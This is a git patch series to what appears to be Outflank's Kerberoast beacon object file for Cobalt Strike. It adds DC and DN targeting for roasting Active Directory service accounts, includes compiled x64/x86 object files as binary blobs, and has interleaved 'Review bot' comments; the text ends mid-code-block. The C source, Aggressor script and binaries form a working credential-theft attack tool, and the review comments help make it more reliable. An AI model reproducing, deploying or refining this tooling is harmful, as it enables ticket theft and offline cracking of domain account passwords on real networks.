From 738c5ab29c652062b4b630e0c42947804671184a Mon Sep 17 00:00:00 2001 From: nviso-facar Date: Wed, 28 Aug 2024 14:18:23 +0200 Subject: [PATCH 1/3] Added custom DC / DN specification for the roast command, plus small OPSEC change in the roast LDAP query --- BOF/Kerberoast/Kerberoast.cna | 24 ++++++++---- BOF/Kerberoast/Kerberoast.x64.o | Bin 0 -> 15025 bytes BOF/Kerberoast/Kerberoast.x86.o | Bin 0 -> 14259 bytes BOF/Kerberoast/SOURCE/Kerberoast.c | 59 ++++++++++++++++++----------- 4 files changed, 53 insertions(+), 30 deletions(-) create mode 100644 BOF/Kerberoast/Kerberoast.x64.o create mode 100644 BOF/Kerberoast/Kerberoast.x86.o diff --git a/BOF/Kerberoast/Kerberoast.cna b/BOF/Kerberoast/Kerberoast.cna index 196b11c..65c471b 100644 --- a/BOF/Kerberoast/Kerberoast.cna +++ b/BOF/Kerberoast/Kerberoast.cna @@ -5,7 +5,9 @@ #register help beacon_command_register("Kerberoast", "Perform Kerberoasting against all (or specified) SPN enabled accounts.", "List all SPN enabled user/service accounts or request service tickets (TGS-REP) which can be cracked offline using HashCat.\n\n" . - "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ]\n\n" . + "Synopsis: Kerberoast [list, list-no-aes, roast or roast-no-aes] [account ] [DC hostname/IP ] [DN ]\n" . + "Example 1: Kerberoast roast svc_sql \n" . + "Example 2: Kerberoast roast svc_sql dc1.domain.local CN=domain,CN=local #listing cross-domain is not implemented\n\n" . "WARNING: Listing and roasting tickets without sAMAccountName filter is OPSEC UNSAFE!\n\n"); alias Kerberoast { @@ -16,6 +18,8 @@ alias Kerberoast { $action = @args[0]; $filter = @args[1]; + $dc = @args[2]; + $dn = @args[3]; if ($action eq "") { berror($bid, "Please specify an action (list, list-no-aes, roast or roast-no-aes)."); 
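Review bot: The DN shown in `Example 2` is not a valid naming-context DN: the domain domain.local is addressed as `DC=domain,DC=local`, not `CN=domain,CN=local`, and because the BOF binds to `LDAP://<DC>/<DN>` with the DN taken verbatim, a user who copies the example will most likely get a failed bind. Change the line to `"Example 2: Kerberoast roast svc_sql dc1.domain.local DC=domain,DC=local\n\n" .`. The same text is rewritten in the second patch's hunk of this file (`@@ -5,9 +5,9 @@`) and carried as context in the third, so it needs the same correction there.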
@@ -27,14 +31,18 @@ alias Kerberoast { $data = readb($handle, -1); closef($handle); - # Pack our arguments - if ($filter eq "") { - $arg_data = bof_pack($bid, "Z", $action); - } - else { - $arg_data = bof_pack($bid, "ZZ", $action, $filter); - } + # Pack our arguments + if ($filter eq "") { + $arg_data = bof_pack($bid, "Z", $action); + } else if ($dc eq "") { + $arg_data = bof_pack($bid, "ZZ", $action, $filter); + } else if ($dn eq "") { + $arg_data = bof_pack($bid, "ZZZ", $action, $filter, $dc); + } else { + $arg_data = bof_pack($bid, "ZZZZ", $action, $filter, $dc, $dn); + } blog($bid, "Kerberoast BOF by Outflank"); beacon_inline_execute($bid, $data, "go", $arg_data); } + 
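Review bot: `$dc` and `$dn` are silently discarded when `$filter` is empty, because the first branch packs only `$action` and the DC/DN branches are never reached. Either reject that combination before packing, e.g. `if ($filter eq "" && $dc ne "") { berror($bid, "A sAMAccountName filter is required when a DC or DN is given."); return; }`, or pack the filter as `"*"` in that case, which appears to be what the BOF already substitutes for a missing filter. The replaced `# Pack our arguments` block also re-emits lines whose content is unchanged, which suggests a whitespace-only re-indentation that hides the real change in the diff.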
diff --git a/BOF/Kerberoast/Kerberoast.x64.o b/BOF/Kerberoast/Kerberoast.x64.o new file mode 100644 index 0000000000000000000000000000000000000000..b18eb69dc9cf37492876f90892c929f7be4e007d GIT binary patch literal 15025 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 JS4Oz%`(LvDsi^<} literal 0 HcmV?d00001 
diff --git a/BOF/Kerberoast/Kerberoast.x86.o b/BOF/Kerberoast/Kerberoast.x86.o new file mode 100644 index 0000000000000000000000000000000000000000..0cfdd92aa53f735280ea7a4981145d210b5eb2d7 GIT binary patch literal 14259 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 literal 0 HcmV?d00001 diff --git a/BOF/Kerberoast/SOURCE/Kerberoast.c b/BOF/Kerberoast/SOURCE/Kerberoast.c index 18da0aa..c1351af 100755 --- a/BOF/Kerberoast/SOURCE/Kerberoast.c +++ b/BOF/Kerberoast/SOURCE/Kerberoast.c 
@@ -208,7 +208,7 @@ HRESULT FindSPNs(_In_ IDirectorySearch *pContainerToSearch, _In_ BOOL bListSPNs, BOOL bResult = FALSE, bRoast = FALSE; WCHAR wcSearchFilter[BUF_SIZE] = { 0 }; LPCWSTR lpwFormat = L"(&(objectClass=user)(objectCategory=person)%ls(!(userAccountControl:1.2.840.113556.1.4.803:=2))(servicePrincipalName=*)(sAMAccountName=%ls))"; - LPCWSTR lpwFormatNoListSpn = L"(&(objectClass=user)(objectCategory=person)%ls(!(userAccountControl:1.2.840.113556.1.4.803:=2))(sAMAccountName=%ls))"; + LPCWSTR lpwFormatNoListSpn = L"(&(objectClass=user)(objectCategory=person)%ls(sAMAccountName=%ls))"; PUSER_INFO pUserInfo = NULL; INT iCount = 0; DWORD x = 0L; @@ -507,7 +507,7 @@ HRESULT FindSPNs(_In_ IDirectorySearch *pContainerToSearch, _In_ BOOL bListSPNs, return hr; } -HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR lpwFilter) { +HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR lpwFilter, _In_ LPCWSTR lpwDC, _In_ LPCWSTR lpwDN) { HRESULT hr = S_OK; HINSTANCE hModule = NULL; IADs* pRoot = NULL; 
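Review bot: `lpwFormatNoListSpn` no longer carries the `userAccountControl:1.2.840.113556.1.4.803:=2` clause that `lpwFormat` still has, so the list and roast paths now select different account sets (the roast path no longer excludes accounts with the disabled bit set), and nothing in the code records that this divergence is deliberate. A comment above the declaration should state it, e.g. `// Roast path: intentionally omits the userAccountControl match-rule clause used in lpwFormat, so disabled accounts are not filtered out here.` The enclosing function `FindSPNs` starts and ends outside the hunk.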
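Review bot: The new `lpwDC` and `lpwDN` parameters are annotated `_In_`, which asserts a non-null pointer, yet the body (next hunk) tests both against `NULL` and `go` passes them straight from `BeaconDataExtract`, which the surrounding code relies on to yield `NULL` for an argument that was not packed. The signature should read `_In_opt_ LPCWSTR lpwDC, _In_opt_ LPCWSTR lpwDN`, and a short comment above it should say that both are optional and that `lpwDN` is only used together with `lpwDC`. The body of `SearchDirectory` continues past the end of the hunk.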
@@ -537,28 +537,38 @@ HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR hr = OLE32$IIDFromString(pIADsIID, &IADsIID); hr = OLE32$IIDFromString(pIDirectorySearchIID, &IDirectorySearchIID); - // Get rootDSE and the current user's domain container DN. - hr = ADsOpenObject(L"LDAP://rootDSE", - NULL, - NULL, - ADS_USE_SEALING | ADS_USE_SIGNING | ADS_SECURE_AUTHENTICATION, // Use Kerberos encryption - &IADsIID, - (void**)&pRoot); - if (FAILED(hr)) { - BeaconPrintf(CALLBACK_ERROR, "Failed to get rootDSE.\n"); - goto CleanUp; - } + // Construct the LDAP path + if (lpwDC != NULL && lpwDN != NULL) { // Use DC and DN if provided + MSVCRT$swprintf_s(wcPathName, BUF_SIZE, L"LDAP://%ls/%ls", lpwDC, lpwDN); + BeaconPrintf(CALLBACK_OUTPUT, "wcPathName 1: %ls\n", wcPathName); + } else if (lpwDC != NULL && lpwDN == NULL) { + MSVCRT$swprintf_s(wcPathName, BUF_SIZE, L"LDAP://%ls", lpwDC); + BeaconPrintf(CALLBACK_OUTPUT, "wcPathName no DN: %ls\n", wcPathName); + } else { + // Get rootDSE and the current user's domain container DN. 
+ hr = ADsOpenObject(L"LDAP://rootDSE", + NULL, + NULL, + ADS_USE_SEALING | ADS_USE_SIGNING | ADS_SECURE_AUTHENTICATION, // Use Kerberos encryption + &IADsIID, + (void**)&pRoot); + if (FAILED(hr)) { + BeaconPrintf(CALLBACK_ERROR, "Failed to get rootDSE.\n"); + goto CleanUp; + } + + OLEAUT32$VariantInit(&var); + hr = pRoot->lpVtbl->Get(pRoot, (BSTR)L"defaultNamingContext", &var); + if (FAILED(hr)) { + BeaconPrintf(CALLBACK_ERROR, "Failed to get defaultNamingContext."); + goto CleanUp; + } - OLEAUT32$VariantInit(&var); - hr = pRoot->lpVtbl->Get(pRoot, (BSTR)L"defaultNamingContext", &var); - if (FAILED(hr)) { - BeaconPrintf(CALLBACK_ERROR, "Failed to get defaultNamingContext."); - goto CleanUp; + MSVCRT$wcscpy_s(wcPathName, _countof(wcPathName), L"LDAP://"); + MSVCRT$wcscat_s(wcPathName, _countof(wcPathName), var.bstrVal); + BeaconPrintf(CALLBACK_OUTPUT, "wcPathName no extras: %ls\n", wcPathName); } - MSVCRT$wcscpy_s(wcPathName, _countof(wcPathName), L"LDAP://"); - MSVCRT$wcscat_s(wcPathName, _countof(wcPathName), var.bstrVal); - hr = ADsOpenObject((LPCWSTR)wcPathName, NULL, NULL, @@ -595,6 +605,8 @@ VOID go(IN PCHAR Args, IN ULONG Length) { BOOL bExcludeAES = FALSE; LPCWSTR lpwArgs = NULL; LPCWSTR lpwFilter = NULL; + LPCWSTR lpwDC = NULL; + LPCWSTR lpwDN = NULL; // Parse Arguments datap parser; @@ -602,6 +614,9 @@ VOID go(IN PCHAR Args, IN ULONG Length) { lpwArgs = (WCHAR*)BeaconDataExtract(&parser, NULL); lpwFilter = (WCHAR*)BeaconDataExtract(&parser, NULL); + lpwDC = (WCHAR*)BeaconDataExtract(&parser, NULL); + lpwDN = (WCHAR*)BeaconDataExtract(&parser, NULL); + if (lpwArgs != NULL && MSVCRT$_wcsicmp(lpwArgs, L"list") == 0) { bListSPNs = TRUE; } @@ -621,7 +636,7 @@ VOID go(IN PCHAR Args, IN ULONG Length) { lpwFilter = L"*"; } - hr = SearchDirectory(bListSPNs, bExcludeAES, lpwFilter); + hr = SearchDirectory(bListSPNs, bExcludeAES, lpwFilter, lpwDC, lpwDN); if (FAILED(hr)) { GetFormattedErrMsg(hr); } 
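Review bot: Both new `MSVCRT$swprintf_s` calls size the destination with `BUF_SIZE` and ignore the return value, while the `else` branch sizes the same buffer with `_countof(wcPathName)`; `lpwDC` and `lpwDN` are operator-supplied strings of arbitrary length, and when the formatted path does not fit, `swprintf_s` invokes the CRT invalid-parameter handler, which by default terminates the process — here presumably the process hosting the beacon. Use `_countof` consistently and treat a negative return as a failure that jumps to `CleanUp`, as below. Separately, `OLEAUT32$VariantInit(&var)` now runs only in the `else` branch; if `var` is declared without an initializer and cleared at `CleanUp` (its declaration is outside the hunk), the two new branches reach the cleanup with an uninitialized VARIANT, so the init should move ahead of the `if`. The function continues past the hunk.
```c
    // Construct the LDAP path; a path that does not fit wcPathName is an error, not a crash
    if (lpwDC != NULL && lpwDN != NULL) { // Use DC and DN if provided
        if (MSVCRT$swprintf_s(wcPathName, _countof(wcPathName), L"LDAP://%ls/%ls", lpwDC, lpwDN) < 0) {
            BeaconPrintf(CALLBACK_ERROR, "LDAP path exceeds buffer size.\n");
            hr = E_INVALIDARG;
            goto CleanUp;
        }
    } else if (lpwDC != NULL) { // Use only DC if DN is not provided
        if (MSVCRT$swprintf_s(wcPathName, _countof(wcPathName), L"LDAP://%ls", lpwDC) < 0) {
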